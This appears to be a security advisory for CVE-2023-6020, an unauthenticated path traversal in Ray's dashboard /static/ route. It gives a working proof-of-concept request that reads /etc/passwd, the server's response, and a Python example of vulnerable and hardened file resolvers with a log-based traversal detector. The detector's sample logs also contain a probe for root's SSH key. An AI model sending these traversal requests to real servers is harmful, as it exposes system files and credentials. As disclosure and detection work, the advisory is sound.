Headline
CVE-2023-6020: LFI in Ray API - GET /static/ in ray
Path traversal (reported as LFI) in the /static/ route of Ray's web API allows unauthenticated remote attackers to read any file on the server that the Ray process can read.
Description
The /static/ handler does not reject ".." path segments, so a remote attacker can make a single unauthenticated request that traverses out of the static directory and reads any file on the system that the Ray process has permission to read, such as SSH private keys. The proof of concept below targets the default port 8265 and returns the host's /etc/passwd with a 200 response.
Proof of Concept
GET /static/js/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: localhost:8265
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8265/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Etag: "174880dae894b157-2020"
Last-Modified: Thu, 02 Mar 2023 04:48:59 GMT
Content-Length: 8224
Accept-Ranges: bytes
Date: Thu, 24 Aug 2023 23:01:58 GMT
Server: Python/3.8 aiohttp/3.8.5
Connection: close
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
[...]
Impact
An unauthenticated attacker can read any file on the server that is readable by the user account Ray was started as; if Ray runs as root, that is every file on the host, including SSH keys and other credentials.
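As an added illustration (not code from the Ray project or from the report above), the following Python shows the two sides of this bug: a naive static-file resolver that joins the URL path onto the static root with no containment check, a hardened resolver that percent-decodes, normalizes and confirms the result stays under the root, and a detector that flags traversal attempts in aiohttp-style access logs. The static root, the log lines and all function names are constructed for this example and are not Ray's own code or paths.

```python
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Hypothetical static root; Ray's real layout is not reproduced here.
STATIC_ROOT = "/srv/dashboard/static"


def resolve_naive(static_root: str, url_path: str) -> str:
    """Mirror the vulnerable pattern: join the request path onto the
    static root and normalize, with no check that the result is still
    inside the root. Any '..' segments walk straight out of the tree."""
    return posixpath.normpath(posixpath.join(static_root, url_path.lstrip("/")))


def resolve_safe(static_root: str, url_path: str) -> Optional[str]:
    """Hardened resolver: decode percent-escapes first (so '%2e%2e' cannot
    slip past), normalize, then require that the candidate shares the whole
    root as its common prefix. commonpath (not startswith) is used so that
    '/srv/dashboard/static-evil/x' is also rejected. Returns None on escape.
    Note: symlinks inside the root are not resolved here; a production
    resolver should additionally realpath() the candidate."""
    root = posixpath.normpath(static_root)
    decoded = unquote(url_path)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


# Constructed aiohttp-style access log lines (format:
# '%a %t "%r" %s %b "%{Referer}i" "%{User-Agent}i"'); not real Ray logs.
SAMPLE_ACCESS_LOG = [
    '127.0.0.1 [24/Aug/2023:23:01:58 +0000] "GET /static/js/../../../../../../etc/passwd HTTP/1.1" 200 8224 "http://localhost:8265/" "Mozilla/5.0"',
    '127.0.0.1 [24/Aug/2023:23:02:10 +0000] "GET /static/js/main.js HTTP/1.1" 200 51234 "http://localhost:8265/" "Mozilla/5.0"',
    '10.0.0.7 [24/Aug/2023:23:05:41 +0000] "GET /static/css/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa HTTP/1.1" 404 0 "-" "curl/8.1"',
]

REQUEST_LINE_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def find_traversal_hits(log_lines: List[str]) -> List[Tuple[str, int]]:
    """Return (decoded_path, status) for every request to /static/ whose
    decoded path contains a '..' segment. Single-level percent-encoding is
    undone; doubly encoded probes ('%252e') would need a second unquote."""
    hits: List[Tuple[str, int]] = []
    for line in log_lines:
        m = REQUEST_LINE_RE.search(line)
        if not m:
            continue
        path = unquote(m.group("target")).split("?", 1)[0]
        if path.startswith("/static/") and ".." in path.split("/"):
            hits.append((path, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    probe = "js/../../../../../../../../../../../../../../etc/passwd"
    print("naive :", resolve_naive(STATIC_ROOT, probe))
    print("safe  :", resolve_safe(STATIC_ROOT, probe))
    for path, status in find_traversal_hits(SAMPLE_ACCESS_LOG):
        print(f"traversal attempt -> {status} {path}")
```

A 200 on a traversal path in the access log is the signal to act on: a 404 shows that the attacker probed, a 200 shows the file was served. Run the detector over historical dashboard logs after upgrading, since a successful read of /etc/passwd is usually followed by attempts on SSH keys and token files.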
Occurrences